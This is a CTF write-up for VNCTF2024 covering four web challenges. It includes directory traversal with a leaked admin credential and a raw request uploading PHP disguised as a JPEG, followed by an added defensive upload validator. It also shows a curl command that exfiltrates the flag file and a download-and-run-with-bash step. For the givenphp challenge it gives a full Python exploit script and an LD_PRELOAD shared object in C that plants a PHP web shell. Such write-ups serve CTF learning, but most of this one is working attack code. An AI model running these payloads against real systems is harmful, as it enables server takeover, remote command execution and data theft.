
VNCTF2024 WriteUp

By V3g3t4ble

CutePath

http://manqiu.top:20912/#/../../../../ allows directory traversal.

http://manqiu.top:20912/#/../../../..//home/ming

There is a file whose name is base64-encoded; it decodes to admin:gdgm.edu.cn@M1n9K1n9P@as. Log in with these credentials.

Rename /flag/flag/flag.txt to ../../../../../../../home/ming/share_main/flag.txt

TrySent

https://blog.hanayuzu.top/articles/37dacab4.html

Just follow the article above.

POST /user/upload/upload HTTP/1.1
Host: target.com
Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728
Content-Length: 894
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
Connection: close

------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"

test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"

image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"

164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg

JFIF
<?php phpinfo();?>

------WebKitFormBoundaryrhx2kYAMYDqoTThz--
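
The file part of the request above carries filename="test.php" while declaring Content-Type: image/jpeg, and its body as shown does not start with a JPEG signature. As an added example (not from the original writeup or from the application's code), the server-side checks below reject that part; validate_upload, ALLOWED, MAX_SIZE and the sample byte strings are assumptions made for illustration.

```python
import os
import secrets

# Extension allowlist, each mapped to the magic bytes such a file must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_SIZE = 2 * 1024 * 1024  # assumed limit, not taken from the page


def validate_upload(filename, declared_type, data):
    """Return (ok, reason, stored_name) for one uploaded file part."""
    # Keep only the last path component of the client-supplied name.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or "\x00" in base:
        return False, "bad filename", None
    # Decide on the extension of the filename itself, never on the
    # client-controlled Content-Type header or a separate "name" field.
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not allowed", None
    if not declared_type.lower().startswith("image/"):
        return False, "declared type is not an image", None
    if len(data) > MAX_SIZE:
        return False, "too large", None
    # Magic bytes catch mislabelled content; they do not stop polyglot files,
    # so the allowlisted extension and server-chosen name remain the real control.
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    # Store under a random name so the client never controls the path on disk.
    return True, "ok", secrets.token_hex(16) + ext


# Constructed samples: the first mirrors the file part of the request above.
SAMPLES = [
    ("test.php", "image/jpeg", b"JFIF\n<?php phpinfo();?>\n"),
    ("test.jpg", "image/jpeg", b"JFIF\n<?php phpinfo();?>\n"),
    ("test.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"),
]

if __name__ == "__main__":
    for name, ctype, body in SAMPLES:
        print(name, validate_upload(name, ctype, body)[:2])
```

Uploaded files should also be stored in a directory where the web server does not execute scripts.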

codefever_again

https://www.ctfiot.com/95359.html

real world git

Exfiltrate the flag with curl.

flag.sh

curl -X POST xxx -d "$(cat /f*)"

Download the script with curl, then run it with bash.

givenphp

import sys

from requests import get, post

url = sys.argv[1]

# Upload the shared object; the last ">"-delimited piece of the response is the stored filename.
with open("evil.so", "rb") as f:
    response = post(
        url=url,
        files={"file": f},
        data={"upload": "upload"},
        # proxies={"http": "http://127.0.0.1:8080"}
    )

key = "LD_PRELOAD"
value = response.text.split(">")[-1]
# value = ""
print("filename:", value)

url = f"{url}?challenge=challenge&key={key}&value={value}&guess=%00lambda_1"
print("url:", url)

# Repeat the request until the response contains "www".
while True:
    response = get(url)
    if "www" in response.text:
        print(response.text)
        break

evil.c

#include <stdio.h>
#include <stdlib.h>

/* _init runs when the shared object is loaded; the build uses -nostartfiles
   so this definition does not clash with the default startup files. */
void _init() {
    FILE *file;
    file = fopen("/var/www/html/shell.php", "w");
    if (file == NULL) {
        /* Could not open the file. */
        printf("无法打开文件\n");
        return;
    }
    fprintf(file, "<?php system($_GET['cmd']);\n");
    fclose(file);
    /* File written successfully. */
    printf("文件写入成功\n");
}

gcc -fPIC -shared -o evil.so evil.c -nostartfiles